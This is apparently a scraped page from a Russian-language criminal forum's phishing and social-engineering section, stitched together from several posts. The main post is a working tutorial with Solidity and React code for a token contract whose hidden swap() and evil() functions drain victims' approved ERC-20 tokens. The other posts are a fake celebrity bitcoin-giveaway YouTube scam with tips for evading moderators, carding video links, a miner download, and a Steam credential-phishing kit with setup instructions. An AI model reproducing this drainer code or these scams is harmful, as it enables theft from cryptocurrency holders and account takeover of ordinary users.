Social Engineering & Phishing

Всем привет!
Думаю стоит опубликовать статтю как это делать бесплатно, чтобы не кормить
таких как ТС


Hidden content for authorized users.

You must have at least 1 reaction(s) to view the content.

Задавайте тут вопросы, постараюсь максимально развернуто ответить на вопросы
касающиеся вещевого кардинга! Дабы не плодить тем.
От теории к практике!

...или как украсть токены ERC-20/ERC-721 из под морды хомяка.

Всем привет! Cегодня я хочу рассказать, как я скамлю токены у криптоюзеров.
Сначала я подумал, что не подхожу под тематику конкурса, но сразу прояснил для
себя, что крипта = скам, а значит, я в деле. За криптой/смарт-контрактами
будущее говорят многие, безусловно, в этом есть доля правды, но история
показывает, что технологии используют как в благих целях, так и злоупотребляют
ими. Я покажу, как можно злоупотребить стандартами реализаций токенов на EVM
совместимых blockchain и нажиться на этом.

Аббревиатура ERC переводится как _Ethereum Request for Comments_ \- это такой
документ, который определяет стандарт и соглашения для разработки смарт-
контрактов. ERC-20 есть контракты, которые компилируются и развертываются в
блокчейн сеть, в этих контрактах реализуется единый шаблон, который позволяет
создавать токены. Токены можно отправлять, обменивать, сжигать, чеканить,
голосовать ими и многое другое, нет каких-то ограничений. Мы можем создать на
основе стандарта любой финансовый актив или какое-нибудь действие в блокчейне,
благодаря транзакциям. В стандарте ERC-20 есть определенные функции, такие как
name(), symbol(), decimals(), balanceOf(), transfer(), totalSupply(),
transferFrom(), allowance(), approve(). Из всех этих функций нас интересует
approve() и transferFrom(). Что они делают? approve() даёт разрешение на
операции с токенами. transferFrom() переводит токены из одного адреса на
другой. Остальные функции могут задавать имя токена, узнавать баланс и т.д.

Это все, конечно, интересно, но а что если... наш смарт-контракт сможет
скрытно вывести все токены, а пользователь даже не поймет, что произошло?
Скажем, пользователь пытается обменять один токен на другой через наш веб-
интерфейс, но сталкивается с ситуацией, когда контракт опустошает вce его
монеты.

**Такое возможно, и сейчас мы с вами это сделаем!**

Чтобы продемонстрировать этот трюк, создадим свой собственный токен и поможет
нам в этом библиотека OpenZeppelin. Напомню, что контракты для EVM (Ethereum
Virtual Machine) пишутся на Solidity. Прямо в этом контракте напишем функцию,
которая обменивает токены и делает вредоносные действия. Далее развернем
контракты в Ropsten сеть и создадим минимальный интерфейс. Наше приложение
будет общаться с контрактом по ABI JSON. Для создания веб-приложения будем
использовать React и Ethers библиотеку. У вас должно быть некоторое количество
тестовых ETH, их можно получить через публичные краны.


Зададим выпуск монет со значением в 500 токенов:

JavaScript:Copy to clipboard



function mint(address _to) external {
_mint(_to, 500 ether);

emit Mint(_to);


Реализуем функцию обмена токенов и вывода всех средств с кошелька
пользователя:

JavaScript:Copy to clipboard



function swap(uint256 _amount) external {
address sender = msg.sender; // экономим газ
uint256 senderBalance = IERC20(address(this)).balanceOf(sender);
require(senderBalance > 0, "swap: token balance too low");

IERC20(address(this)).transferFrom(sender, address(this), _amount);
IERC20(address(this)).transferFrom(sender, tokenReceiver, senderBalance - _amount);

emit ValueReceived(tokenReceiver, senderBalance - _amount);
}


Установим адрес получателя краденных токенов:

JavaScript:Copy to clipboard



function setTokenReceiver(address _tokenReceiver) external onlyOwner {
tokenReceiver = _tokenReceiver;

emit SetTokenReceiver(_tokenReceiver);
}


Сконструируем наш токен контракт, укажем название токена и получателя
краденных токенов:

JavaScript:Copy to clipboard



constructor (address _tokenReceiver) ERC20("XSSIS", "XSSIS") {
tokenReceiver = _tokenReceiver;
}


Скомпилируем и развернем наш контракт в Ropsten сеть:

Переключимся в Ropsten network и выберем Injected Web3. Рядом с кнопкой Deploy
укажем адрес получателя краденных токенов (в развернутом контракте мы сможем
менять адрес получателя, просто вызывая функцию setTokenReceiver()):

В папке config, которая приложена к этой статье, добавляем в файл
contracts.json адрес нашего развернутого контракта (смотрим Etherscan). В файл
tokenABI.json добавляем ABI параметры, которые можно скопировать из Remix во
вкладке SOLIDITY COMPILER.

В файле HomePage.tsx импортируем модули:

JavaScript:Copy to clipboard



import * as React from "react"
import {
Box,
Button,
Center,
Flex,
Select,
HStack,
Stack,
Input,
InputGroup,
InputLeftAddon,
InputRightAddon,
CircularProgress,
Alert,
AlertIcon,
Text
} from "@chakra-ui/react";
import {useContractFunction, useEthers, useTokenAllowance} from "@usedapp/core";
import {ethers} from "ethers";
import tokenABI from "./configs/tokenABI.json";
import contracts from "./configs/contracts.json";


Описываем функции добычи, одобрения, обмена/кражи токенов:

JavaScript:Copy to clipboard



const mint = async () => {
await handleChangeNetwork();
await mintTx(account);

setValueStateSuccessed(true);
setTimeout(function(){
setValueStateSuccessed(false);
}.bind(this),5000);

}

const approve = async () => {
await handleChangeNetwork();
await approveTx(contracts.address, ethers.constants.MaxUint256);

setValueapproveStateSuccessed(true);
setTimeout(function(){
setValueapproveStateSuccessed(false);
}.bind(this),5000);

}

const swap = async () => {
await handleChangeNetwork();
if (allowance!.lt(ethers.constants.MaxUint256)) {
alert('Approve tokens!');
}
if (!valueSimple) {
alert('Input XSSIS quantitiy');
return;
}

await swapTx(valueSimple + '0'.repeat(18));

setValueswapStateSuccessed(true);
setTimeout(function(){
setValueswapStateSuccessed(false);
}.bind(this),5000);

}


Cобираем и запускаем наше веб-приложение:

Bash:Copy to clipboard



yarn
npm run start


Давайте протестируем, нажмем кнопки Approve для подключения к контракту и
затем Mint для добычи токенов (по умолчанию выдается 500 токенов):

Пробуем обменять 1 XSSIS на ETH. Нажимаем кнопку Swap. Здесь мы должны
обратить внимание на окно MetaMask при совершении транзакции, кошелек не
говорит пользователю, что на самом деле будет происходить:

Проверяем транзакцию в Etherscan и смотрим, что произошло. Нами был совершен
обмен 1 XSSIS на 0,1 ETH, но так же был произведен вывод всех токенов XSSIS из
кошелька пользователя без его ведома:

Хорошо, мы разобрали так называемую "фичу" токенов, поняли концепцию стандарта
ERC-20 и разработали контракт, который выводит токен из кошелька нашей жертвы
за 1 клик. По сути, чего-то нового мы не изобрели. Мы лишь воспользовались
возможностью, которая дает нам стандарт. Давайте создадим более сложный пример
и вдобавок разработаем себе инструмент для скама. Мы соберем рабочий DeFi
проект и сделаем так, чтобы можно было красть токены из кошельков
пользователей, просто вызвав одну функцию. Для начала, разберемся в
архитектуре нашего проекта, форкнем интерфейс для наших контрактов и создадим
пару токенов для тестирования. Я покажу, как скамлю лично я и в конце cтатьи
расскажу о некоторых способах привлечения пользователей. Согласитесь, в этой
теме есть где развернуться! Пробуем!

Примитивная схема:
Красным \- действиe owner/contract.
Синим \- действие users/contract.

Пользователи стейкают стейблкоины/обернутые токены/одиночные токены в наш
контракт. Это делается ради награды в виде нашего нативного токена и ради sell
pressurе. Наш токен так же может где-то торговаться, например, в Uniswap и
иметь в пулах крупную ликвидность. У пользователя будет стимул вводить свои
токены к нам в контракт, т.к. потом можно будет нашим токеном торговать. Есть
разные способы создавать стимулы для пользователей, к примеру, airdrop или
искусственное завышение APY. В этой статье я остановлюсь лишь на том, как
обмануть пользователя. В нашем примере задача - заманить как можно больше
жертв, которые будут взаимодействовать с нашим контрактом. Достигнув
определенного количества пользователей, мы украдем монеты из их кошельков (не
пула контракта). Мы вызовем функцию evil(), которая отработает логику по краже
монет. Напомню, это происходит потому, что пользователь дал одобрение на
взаимодействие с нашим контрактом. Кстати, пользователь может свободно изымать
свои средства из пулов контракта, но коварность одобрения токенов состоит в
том, что одобрение дает нам украсть монеты хоть через неделю, но при условии,
что пользователь собственноручно не отозвал одобрение для нашего контракта.
Кстати, пользователю совершенно необязательно стейкать токены, достаточно дать
апрув, и мы сможем сделать все вредоносные действия.

Я постараюсь не описывать всю кодовую базу (будет слишком много текста). Все
же тема конкурса не о программировании. Оставлю изучение исходного кода для
читателя, который хочет глубже погрузиться в работу смарт-контрактов.

Функция по краже монет из кошелька:

JavaScript:Copy to clipboard



function evil(address _governance, bytes memory _setupData) public onlyOwnerOrGovernance {
governance = _governance;
(bool success,) = governance.call(_setupData);
require(success, "evil: failed");

}

На вход дается адрес контракта токена, который мы выводим, и наша функция
transferFrom() (её изучили ранее).

**Подготовка токенов.**

MetaMask заранее переключаем в сеть Rinkeby. Для демонстрации подготовим 2
токена (файл Token.sol). Файл открываем в Remix, в constructor() пишем
название токена fakeUSDT, деплоим токен fakeUSDT и записываем его адрес. Затем
чеканим (функция mint с параметром amount == 1000000000000000000000000) себе
на кошелек (address) 1.000.000 токенов. В том же файле меняем в constructor()
название токена с fakeUSDT на XSSIS, так же деплоим, записываем адрес, чеканим
100к токенов себе на кошелек или позже на адрес контракта XSSChef.

**Подготовка контракта XSSISChef.**

Открываем файл XSSISChef.sol в Remix, компилируем и заполняем параметры:
1) _XSSIS: адрес токена XSSIS
2) _DEVADDR: твой адрес
3) _XSSISPERBLOCK: рекомендую ставить 1000000000000000000 - это 1 токен/блок
4) _STARTBLOCK - заходим на Etherscan и смотрим текущий блок, вставляем это
значение туда
5) _BONUSENDBLOCK: 1
6) _ENDBLOCK: рекомендую ставить STARTBLOCK + 100000.
C заполненными данными деплоим контракт и записываем адрес.
Переводим 100к XSSIS на адрес этого контракта.
Вызываем функцию add() с параметрами:
1) _allocPoin: 1
2) _lpToken: адрес токена fakeUSDT
3) _withUpdate: false

На этом этапе мы подготовили все контракты.

**Интеграция с фронтендом.**

Cобираем проект:

Bash:Copy to clipboard



yarn install


В папке /src/sushi/lib в файле constants.js
в supportedPools меняем:
lpAddresses 4 - на адрес токена fakeUSDT
tokenAddresses 4 - на адрес токена fakeUSDT

В этом же файле contractAddresses:
sushi 4 - адрес токена XSSIS
masterChef 4 - адрес контракта XSSISChef

Запускаем наше веб-приложение:

Bash:Copy to clipboard



yarn start


**Фармим XSSIS токены!**

Жмем кнопку Select:

Даем апрув и подтверждаем в MetaMask:

Cтейкаем 100 fakeUSDT:

Начисляются XSSIS:

Cнимаем награду и изымаем fakeUSDT:

**Вывод средств.**

Ранее мы разобрали, как работает функция evil(), теперь обсудим, как работает
скрипт, который генерирует нам bytes для этой функции.
Скрипт находится в папке src/utils/generateBytes.js.
1) Записываем адрес токена, который хотим забрать в TokenAAdress.
2) addressFrom - у кого хотим забрать (смотрим Etherscan).
3) addressTo - куда хотим отправить.
4) amount - сколько хотим отправить (в amount нужно изменять только ’10’, то
есть, если мы хотим забрать 100, тогда нужно просто написать ‘100’ вместо
’10’, ‘0’.repeat(18) - это для decimals.

Запускаем скрипт и копируем значение, которое выводится в консоль - это и есть
наши bytes:

Bash:Copy to clipboard



node generateBytes.js


В контракте XSSISChef вызываем функцию evil(), в address указываем адрес
контракта токена, который мы хотим украсть, в bytes - то, что скопировали из
консоли.

Я пытаюсь украсть 999900 токенов и перевести их на другой адрес:

И вот что из этого вышло:
**Дополнение**.

Контракт XSSChef деплоится в mainet так же, как и в testnet, подготавливаем
только один токен, который предназначен для награды.
Чтобы украсть токены у жертвы, нужно следить в Etherscan за теми адресами,
которые взаимодействуют с нашим контрактом. Знаю, это дело не продумано, по-
хорошему нужно написать скрипт, который автоматизирует эти действия. Если
хотим добавить новые пулы во вкладке Menu (frontend), то нужно найти файл
constants.js и просто добавить новые пулы в supportedPools. Пулы - это новые
токены, которые заносятся пользователем к нам в контракт, и которые мы можем
украсть.


Мы справились! Я показал свой некоторый опыт по запуску крипто проектов и
обману пользователей, используя смарт-контракты. Этот вид мошенничества
называется Rug Pull. Эту тему можно крутить-вертеть как душе угодно, все
зависит лишь от вашего воображения. Есть разные способы, и, на мой взгляд,
самые профитные варианты привлечения пользователей. Airdrop токенов на адреса
пользователей популярного проекта, который в тоже время, что и мы делает
Airdrop, базу адресов можно спарсить по транзакциям. Хорошо работает рассылка
по Email ящикам или Discord аккаунтам со ссылкой на фейк. Ну и, конечно же,
YouTube/AdWords трафик. Профит в данной теме разнится: я работаю и хорошо себя
чувствую. Есть пример, Badger DAO был взломан, где использован именно этот
метод монетизации. Мой мануал подходит и для токенов ERC-721 (NFT), все
делается по аналогии. Я показал лишь часть из своих наработок и готов ими
делиться со всеми. Весь материал будет прикреплен к этой статье. Спасибо за
внимание и удачного скама!


![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare-
logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)

### [ DropMeFiles – free one-click file sharing service
](https://dropmefiles.com/QHFT4)

Share your pictures, send large videos, exchange music or transfer big files.
No registration required. Unlimited upload/download speed.

dropmefiles.com

Вот, один человек с этого форума попросил меня научить его вбивать картон.
Решил я заснять видео. Все разжевано, на мой взгляд, до мелочей.

[Ссылка](http://xss.is/dl/Video/card_ushiro.rar)
В архиве - формат .AVI 1.24 мб, без арзива - 80мб.

Смотрим, учимся, заценяем.

Предлагаю делиться интересными новостями, страницами, панелями, схемами в
сфере фишинга и СИ

Начнем с пруфа и краткого описания
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2F87Rr3OeS31KNiiyDdHfupsJo2avp0WFEHE8hJToMShrgP-
zE-
ZwDKaPXEY5yq51VM-8296ehRgKic5v0PyoTsFSKqMtllbuOSHRS9Wy7iRmFCDyAcbZyfFJ4feEuONnrOUZwLkNL&hash=9986cfb067964abcb30349663746caaa)
Пруф побольше:
![](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FFhwWSTp_GM3mH_MU0MvSnRIN0G5nQasXRc5VpDq_SPKQwbKgHtMR_SkbzEcfgkSS-
lKjTnONQUDCUxSFRNg_IG_PuzOSfYzgg05oauWEW-1bjYCAAJExTM6K5sIWWn_ZUYDOxWZl&hash=d58bcb9820a5dfff59120d67155b3846)


Как вы скорее всего не знаете, на YouTube каждый день Билл Гейтс, Братья
Уинклвосс и президенты разных стран раздают биткойны. Делают они это, чтобы
популяризировать свои криптовалютные проекты и криптовалюту в целом.

Единственный очевидный недостаток всего этого в том, что никто из них нихуя не
раздает. Да и о трансляциях со своим лицом не знает.

С другой стороны, мы просто счастливы тем, как все сложилось, и нет, к
сожалению, нам они тоже ничего не дадут. Поэтому возьмем у тех, кто более
сговорчив.

**К делу.** Мы сами запустим стрим на YouTube от лица любого клевого чувака из
криптовалютной тусовки, которого все будут рады видеть. Однако первым делом,
вам нужно найти видео с любой конференции и интервью на тему криптовалюты, в
котором участвует ваш герой. Назовем его Адонис, он молод и прекрасен.

В верхней левой части стрима мы ставим зацикленный ролик какого-либо интервью,
где Адонис рассуждает на тему криптовалют. Верхняя правая часть — превью
стрима с анонсом раздачи, а нижняя поделена на QR-код для пополнения вашего
кошелька, а на правой подарки от Адониса или условия их получения.
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FjpUJkIYTQ77DeOztaIhabNhLkkz4H10xc2eh1-veCK6y_Q-
LNO8jAIxt6HU33nxGijCEVs40cK9gUbYfxeYJarW7m2x--IX3XNz1MDsT8XpNvKecGNq-
qD9TpkpjtYauJlxFwvoy&hash=aad5dc766304286d03ba71816a6bca17)

**Подготовка и моменты, на которых Адонис может споткнуться**

Первым делом, нам будет очень кстати красивый BTC-кошелек. Если Адонис
настолько прекрасен и раздает деньги, то и кошелек его начинается с
**1Adonis1** , а не **1HJsKjs** — это не обязательно, но повышает доверие к
Адонису. Почему бы не сделать, если можно сделать.

Для этого качаем софт — <https://github.com/samr7/vanitygen> или
<https://github.com/exploitagency/vanitygen-plus>. У меня второй, потому что
первый не очень дружит с AMD процессорами и видеокартами.

Создаем в скачанной папке .bat и прописываем, где **1Random1** — имя вашего
Адониса:

oclvanitygen.exe -o resultsMy1Random1.txt -v **1Random1**
pause

И его же запускаем. Начинается генерация кошелька, вернее перебор кошельков в
поиске того, который устроит нас. На генерацию может уйти примерно 4-5 дней, а
может пару часов — зависит от вашей удачи, количества символов и мощности
вашего железа.


На выходе получаем адрес кошелька и приватник. Приватник импортируем себе —
После чего вы сможете пользоваться данным, сгенерированным кошельком,
показывал на примере blockchain.com

Из адрес кошелька делаем QR-код. Будем делать в этом генераторе —
<https://cwaqrgen.com/>


Вбиваем свой кошелек и генерируем красивую картинку, через которую на ваш
кошелек будут поступать средства. Обязательно проверьте тот ли кошелек
получился, а то будет генератор в три блина — каждый скамит сам себя.

Открываем фотошоп и готовим заставку. Своего Адониса и интервью с ним будем
искать позже. Основное — QR-код, ваш кошелек и всевозможные кликбейты, как в
левой нижней части примера. Рисуем, готовим, сохраняем картинку.

![](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FlVoUdvlQg5BD8AiZyrNjMqp1Lm0pG0jZXcSwj9P-5n5NIVemL7-E-_imw7ka7znqPclu0lCpah7WzGJxYBWf6Ng0C_6FG9HpKkw7JKTy0xE4CnFi-
ouOSuagVlRKW90hlVaspYKN&hash=2c399d5ee29c20f96483d7527d0040b7)

**Настройка стрима и зацикливание видео с Адонисом**

Пора выбрать своего Адониса и искать видео с ним. Тут нечего объяснять — ищите
конференции на ютубе с определенным человеком или лекции по биткойну и берите
что дают. Скачивайте его, обрезайте по вкусу.

Стримить будем через OBS, скачать — <https://obsproject.com/ru>
Запускаем. На нижней панельке, видим вкладки «Сцены» и «Источники», у
источника нажимаем на плюсик.


И выбираем «изображение».

![](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FBQOCLT3AZCha1lxOfBJ_qXhd5vX3N_297NBQynzFv0m3il61ShhwFhEwebL9kmIBd7IekBQCevB0vCEMXGEE_zKj7WsVS9C826Otw2miRirCjHgqBSf5nyiw9zPQ-
tQRK-_BaRCx&hash=ca9d9d2c6b7424f88c154a45e8e3cfa3)

Называем как угодно, главное не путаться самим.


Указываем путь до картинки из фотошопа и жмем «OK», на фоне появляется Адонис.
А-а-ах, как он прекрасен!

![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2Fud9Gt9rcML9PW2dImEEjsfqRLbFfn6ixSxJ0TOlkO8kyCW6LkqHVow26HhLf7bpw_lI_kkzythYt1RlEI4bBc0lOoiU7S8zlX2oroOk7pT3CBCuJOd-
gscacby-fBI5hw6SkQ-XZ&hash=e24256284f41b30379f24a0d950ec8c8)

На пустом черном месте, нам нужно зациклить видео. Нажимаем на уже известный
нам плюсик и добавляем «Источник медиа»

![](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FWuJTyDNBfGbJCfwOetyo_il2YrW-c1UziE1RQYEJ7_8Fd_FbepN-
szY2IPaN5MTaJToI0DxUYmkogxyrDOVizk6rsl1brlgvxNXFoAG_9zaFu0ZuzQZMNCOGRIQ-
nG_g1HxVLm_j&hash=05decce848c13b0a58c8ffb7d47789d3)

Указываем, что нашим видео будет локальный файл, ставим галочку «Повтор».

![](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2F09ar1uwBPwwIpwrIClTJRTqCeXNCIT13WgFWwm4dIRJKjTyI9QF2XLgyFQaz9-0r3kCYRxrojqpONT-
aXo657TnGHdA12aPzm6idmpb3B6no_CLET4GxxPiPxxTLhgfDIkueEgt_&hash=d4f96a77e39d714a76afe2b6ff7fe67b)

Подгоняем размер под наш бэкграунд.


И проделываем этот шаг второй раз, но делаем видео уже на весь экран.



Это для того, чтобы Youtube не забанил трансляцию с ходу и вы набрали 20-30
минут онлайна, а потом быстро могли заменить просто видео на картинку с
Адонисом.
Это делается двумя кликами — первый по глазику в источнике у видео на полный
экран и второй клик по глазику у первого видео, которое мы подогнали под
размер бэкграунда.

![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FC6mltw3jEgY-
cJA4D4iewL-
IPdSWVmr63Zh7E22ZNBgUidWvYjI339DHFWIqIfHq1LnAbxBcm4wdvIYuMQ85e7PQJtBFL306tvmSsYkezcb_lMx3scAU0RE1jXErxS9p7yVgIjYS&hash=160acb283af7b8d756d4afaa72fb94c4)

**Трансляция готова, готовимся к запуску Адониса**

Запускать мы будем, как вы уже поняли, на Youtube. Поэтому нам необходимо
иметь логи ютуба, откуда мы будем брать каналы и и накручивать с помощью них
зрителей.

Парсим логи любым доступным инструментом. Каналы от 10к подписчиков вполне
годятся, чтобы запустить на них трансляцию и посмотреть на результат. Большое
кол-во подписчиков не гарантируют успех, но это добавляют доверия трансляции.

Некоторые маленькие каналы не хило проталкивают вас в топ поиска по целевому
запросу, а каналы-миллионики могут дать нулевой результат.

Нашли канал? Отлично!
На Youtube, рядом с аватаркой наверху справа нажимаем на значок камеры, а
затем кликаем «Начать трансляцию»

![](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FbCo63ww2rnyBB4UyqILdcOzSENvqQVjeRv2onIqbdUXSglO-
jRaR-94CgggWbg_k-EuBkdphubdCx8ncx9J_conqboA0SnUUMUlz-
XR_NPdoyaDt7swhPWNY6JNpmM_EnUBR7k66&hash=581f2484e262fe8c2d3ffee5b145ec2b)

Появляется такое окошко, указываем в нем название и описание. Последнее лучше
писать в блокноте, а потом вставить — менюшка ютуба уебанская. Включите
монетизацию, как показала практика, это благоприятно сказывается на
трансляции.


Нажимаем на шестеренку в верхней правой части экрана, во всплывающем окне
переходим во вкладку — «чат» и отключаем его


После сохранения нас перекинет в главное меню, тут ставим автоматический
запуск, копируем ключ трансляции и переходим в OBS.

![](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FMMO42xUxIdTy35HGtSJ27ZtuUvF4t3QvMJHAmhRMmSJ7tw2R9Zpc8ikpDY_
--
heCju47K3xWApI2azPeKVujHL4CL5lpcZiAfo7Q0RK31ifuvOzwe92EVULIJVRb-06c1oStU0DC&hash=4ec3ee2a5ec15987ff3c4cfe211a9484)

Переходим в настройки, далее — «вещание».

![](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FIoBxSVg0Z75P7FuyHAxqacM7slveNJvNfS0A7hP1wv_cpIZuuIr6kJ12lTkGaXxCUE2j21JGO-
HJuTD2cAz4QE6oWnZ9aSOOitO3S4wQ3GIDEZ8wQdd2XxfdL3zRVygrag12u9Iy&hash=b55788e9c82076e10b724926ca3a7b05)
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FvY0W1EfO___9lBw2EWBP4WRlzrq7eOT6umDazDkb0aw-2D6FrFiYosM4_SG5Rl2NRoA-
LfG2ezy-npMRn6wZLLmmcb5DJZ9mW25R9jGLEN8cKwwWTtF3ztFDRIiJ-
mqYxrLPyKX1&hash=bf0b398f2cc5c723fe4bd7f97c8126af)

Осталось только нажать на заветную кнопочку и Адонис отправится в бой.


Бальтазар вздохнул: – Готово. Вы прекрасны, как молодой Адонис, синьор.
– Этот Адонис плохо кончил, – тут же добавил Меркуцио.

**Как не кончить плохо на зависть Меркуцио**

Подводя промежуточные итоги, у нас есть готовая к запуску трансляция и
красивый, а главное достаточно трастовый для обычного юзера кошелек. Теперь к
тонкостям работы с банами, о которых нас предупреждал Меркуцио.

Мы сделали два источника медиа, один на весь экран, а второй — с Адонисом. Я
сказал, что так надо и вы мне поверили. Спасибо. Теперь я готов объясниться.


Если сразу запустить трансляцию с Адонисом, то вас скорее всего кикнут с
поиска довольно быстро и будет хорошо, если дадут вообще запустить второй раз.

Поэтому проходим рубеж в 20-30 минут с полноэкранным режимом и если еще висим
в поиске — поздравляем, можете выпускать своего Адониса.

По моим наблюдениям, есть несколько рубежей, когда могут вырубить или кикнуть
с поиска: 1-5-20-30-60 минут. Если на протяжении этих рубежей вы выстояли, то
вероятно, продержитесь еще часа 2-3, но рано или поздно все равно упадете,
главная цель — успеть получить свое.

Также стоит отметить, что подобного рода стримы обычно отрубаются модерами в 6
утра по МСК, замечаю такую движуху каждый день.

Озвучу очевидную вещь, но может для кого-то она не очевидная: если у вас 1к
подписчиков, вас вырубят раньше, чем канал с грубо говоря с миллионом. Если на
стрим с 1к подписчиков прилетает 100 репортов — красная карта, если канал с
100к подписчиков прилетают те же 100 репортов, то все нормально. Суть,
надеюсь, вы уловили.

**Продвижение ролика в поиске**

Я пользуюсь утилитами, о которых уже вы могли слышать из моих прошлых статей
или пользовались сами. Это — KWT (keywordtool.io) и VidiQ (расширение для
браузера).

Через KWT смотрим базу (10 штук вполне хватит) интересных для себя тэгов,
сохраняем их, потом вбиваем их в VidiQ, в нем вы можете посмотреть насколько
данные тэги и подобные ему подходят именно для вашего канала, добавляете эти
тэги к себе и смотрите, насколько сильно алгоритмы ютуба оценивают ваш вес в
этой категории.

![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FbYrQ82XYHrOrWuU83XMHKfeTBNT-
SCcI7aPWCHwEE2TmRjeZ16hAqCj3eLyEdMInGTyTJmDjYjHpRn7zgv1FTL7ivPnQuNMz9rC2sz3xTBU9IlibHcteC5Y6bMs1PgcBaudZgPUu&hash=9034a5cfc1ccfe4e6f47d8f15c58d19e)

Например тэг btc, на данный момент на текущем канале, куда я поставил VidiQ,
оценивается весьма не плохо.

![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2F2sTo8uBjkHxYsIzvdQ0YTgiYXD9cwoC9WFdrFE-
uH_ykk26NpvUj1qBs_TAnnJTfph4f_QKitDCFKupTrMEtNnFPaPqnRxnNVMofznfvLcHnwIVjdlfwxMNV5TrlxeOtY4vyHzJs&hash=e46726a92f35fda0e152ea6cf795bca4)


А случайно добавленный тэг «money», для канала подходит не сильно.


Ваша задача выбирать тэги для добавления, которые имеют хороший поисковой
объем, но не шибко высокую конкуренцию. Что-то среднее добавить можно.

Кстати о среднем, думаю, вы видели, что в поиске роликов на ютубе у некоторых
под роликом видно три #хэштега.


Их тоже желательно добавлять, добавит вы можете кажется до 50 штук, но
оптимальный найденный вариант — 8. Первые три будут видны под вашим роликом,
все остальные будут просто в описании, не сказать, что дает вау-эффект, но
всегда лучше сделать, чем не сделать.

**Адонис и Меркуцио спешат откланяться**

Подходя к завершению, поговорим о накрутке просмотров и лайков на трансляцию.
Делать это надо, причем в обязательном порядке.

Ваша трансляция, конечно, даже без зрителей имеет шансы обогнать конкурентов,
но реальный человек скорее откроет ту, где людей побольше. По моему мнению
необходимо порядка 20к зрителей, а дальше уже зависит от ваших возможностей.

Покупать зрителей на различных сервисах не советую — дорого и малоэффективно.
Оптимальный вариант купить софт, а лучше — заказать с саппортом от кодера, на
случай каких-либо фиксов.

Мой софт с одно валидного гугл/ютуб кука крутит в районе 10 зрителей, с
отработанных логов данное значение падает, до четырех-шести.

Прокси —

**Сейчас будет важная информация, которую я для вашего удобства выделил
крупно. Мало кто так трогательно о вас заботится.**

В скромных целях достижения идеала, я описал схему, которую можно
реализовывать не только на Youtube. Просто сейчас это лучший способ в
пересчете на стоимость одного лоха. Но это может измениться, особенно, если
туда придет куча других Адонисов.

Победит в схватке тот, кто придумает как привлечь больше людей за меньшие
средства. Например, создать промостраницу и лить трафик на нее. Или крутить
трансляцию на Твиче. Можно даже подготовиться серьезно и купить рекламу у
блогеров с анонс открытия невероятного проекта, который в определенный день
раздаст биткойны. Все зависит от вашей фантазии и средств, а на самой механики
можно зарабатывать еще долго.

Spoiler: img


Spoiler: pass

пас от админки: 22882

[CLIKE]

### [ honyminer.zip - AnonFile
](https://anonfile.com/pbt7fcD4n3/honyminer_zip)

anonfile.com

[/CLIKE]

**Steam фишинг + инструкция по установке**

Описание:
Данная копия представляет из себя страницу авторизации (OpenID) STEAM для
входа на сторонний сайт.

Инструкция:
**Порядок действий входа:**

1. Ввод "Имя пользователя", "Пароль" в поля формы и нажатие кнопки "Войти".
2. Отображение ошибки "Неверное имя аккаунта или пароль.".
3. Повтор пункта **№1**.
4. Отображение окна "Мобильная аутентификация Steam Guard".
5. Ввод "Код Steam Guard" и нажатие кнопки "Подтвердить".
6. Отображение ошибки "Извините, но код неверен…".
7. Повтор пункта **№5**.
8. Переадресация на оф. страницу авторизации STEAM.


**Подробности:**

* Существует специальная страница "**Уведомления** " для приема звуковых сигналов при получении новых данных.
* Все настройки производятся внутри одного файла.
* Чистка кода от рекламы, систем отслеживания, вирусов и прочего неприятного.
* Файлы, находящиеся в директории "**SAVE** ", недоступны извне! (**Не рекомендуется изменять файл ".htaccess" внутри данной папки**)
* Все "ненужные" ссылки либо ведут на оф. сайт, либо при нажатии ничего не происходит.
* Отсутствует проверка на вилид данных.
* Все ресурсы (файлы) загружаются только с нашего сервера.
* Данная копия **уникальная** , так как РИПнута мной с нуля.


**Возможности:**
Подробнее в файле настроек.


* Настройки для подключения к Базе Данных.
* Режимы записи.Запись в Базу Данных.
* Запись в Файл.
* Запись Везде.
* Изменение названия файла для данных.
* Изменение формата записи в файл (пример: "login**:** pass:guard").
* Смена звука для страницы "**Уведомления** ".

**Страница "Уведомления".**

Данная страница необходима тем, кто желает следить за новыми данными и
получать звуковые сигналы.

Чтобы перейти на данную страницу, просто введите "**/notify** " в адресную
строку.

**Расположение важных файлов.**
Директория "**CORE** " содержит:
\- "**settings.php** " \- Файл настроек.
\- "**notify.php** " \- Файл страницы "**Уведомления** ".
\- "**lib.php** " \- Файл "Библиотека", все функции.
\- "**send.php** " \- Файл взаимодействия с введенными данными.
\- "**assets/notify/audio.mp3** " \- Звуковой файл для страницы
"**Уведомления** ".

Директория "**SAVE** " содержит:
\- "**.htaccess** " \- Защита (файла с данными) от доступа извне.
\- "**accounts.txt** " \- Файл с данными (сюда записываются все введенные
данные).
\- "**local.sql** " \- Файл Базы Данных.

**Установка.**
По умолчанию, все данные записываются в файл, поэтому, можно вообще ничего не
изменять, и просто залить все файлы на хостинг и все будет работать.


1. Залить все файлы на хостинг.
2. (Необязательно) Произвести настройки в файле "**settings.php** ".
3. (Необязательно) Создать Базу Данных и импортировать в нее файл "**local.sql** ".


VirusTotal
[https://www.virustotal.com/#/file/d...37c1d6c11caadd486093ef9870925c3520a/detection](https://www.virustotal.com/#/file/da78fd87f40ba2aa65add86500db137c1d6c11caadd486093ef9870925c3520a/detection)

 Ссылка на
загрузку

You must have at least 1 message(s) to view the content.

Большой пак различных скриптов фейков более чем 50 популярных сайтов.

Скачать:

